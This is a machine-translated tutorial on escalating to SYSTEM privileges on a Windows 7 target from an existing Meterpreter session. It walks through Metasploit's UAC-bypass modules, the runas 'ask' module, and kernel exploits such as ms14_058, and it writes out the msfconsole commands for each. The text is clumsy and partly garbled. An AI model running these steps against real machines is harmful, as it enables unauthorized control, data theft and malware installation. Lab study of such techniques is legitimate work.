Objective
When you perform some action on the victim's machine, you find that some actions are denied, and in order to get full access to the victim machine, you need to bypass the restrictions and get some permissions that are not already available, which can be used to delete files, view private information, or install special programs such as viruses. Metasploit has a number of post-infiltration methods that can be used to bypass permissions on the target machine and ultimately gain access to the system.
Environmental requirements:
1. Attack aircraft: Kali Linux
2. Target machine: Win 7
After a meterpreter shell has been acquired, if the session is 1 and the permissions are not system permissions, use several of the following methods listed below:
First, bypassing UAC to raise rights
This method mainly has the following 3 modules.
The above details of the modules in the Metasploit has been introduced, there is no more to say, the main use of the method. Take Exploit/windows/local/bypassuac module as an example
The module is valid under both Windows 32-bit and 64-bit.
MSF > Use EXPLOIT/WINDOWS/LOCAL/BYPASSUACMSF Exploit (BYPASSUAC) > Set session 1MSF Exploit (BYPASSUAC) > Exploit
After successful execution of this module, a new Meterpreter shell will be returned, as follows
After the module executes successfully, perform getuid discovery or normal permissions, do not despair, continue to execute Getsystem, review permissions again, successfully bypass UAC, and is already system permissions.
The other two module usage is the same as above, the principle is different, after successful execution will return a new Meterpreter shell, and all need to perform Getsystem get system permissions. Such as:
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
Second, improve the program operation level (runas)
This method can take advantage of the Exploit/windows/local/ask module, but the module is actually only a high privilege to restart a return shellcode, and does not bypass UAC, will trigger the system UAC, the victim machine is prompted to prompt the user whether to run, if the user chooses " Yes, the program returns a high-privileged meterpreter shell (which requires execution of Getsystem). As follows:
UAC will pop up on the victim machine, prompting the user to run. As follows:
Third, the use of Windows to raise the right to power
Can take advantage of Metasploit under the existing loopholes, such as ms13_053,ms14_058,ms16_016,ms16_032. Let's take ms14_058 as an example.
MSF > EXPLOIT/WINDOWS/LOCAL/MS14_058_TRACK_POPUP_MENUMSF Exploit (Ms14_058_track_popup_menu) > Set Session 1MSF Exploit (Ms14_058_track_popup_menu) > Exploit
When using Windows to extract rights, the high-privileged Meterpreter shell is returned directly, without the need to execute the getsystem command.
What needs to be explained is: in the actual test, if the target machine does have a loophole, but the power is not successful, please verify that your target and payload is set correctly, 64-bit system is best to use 64-bit payload.
Reference links
Http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/?utm_ Source=tuicool&utm_medium=referral
Metasploit under Windows Multiple right-of-way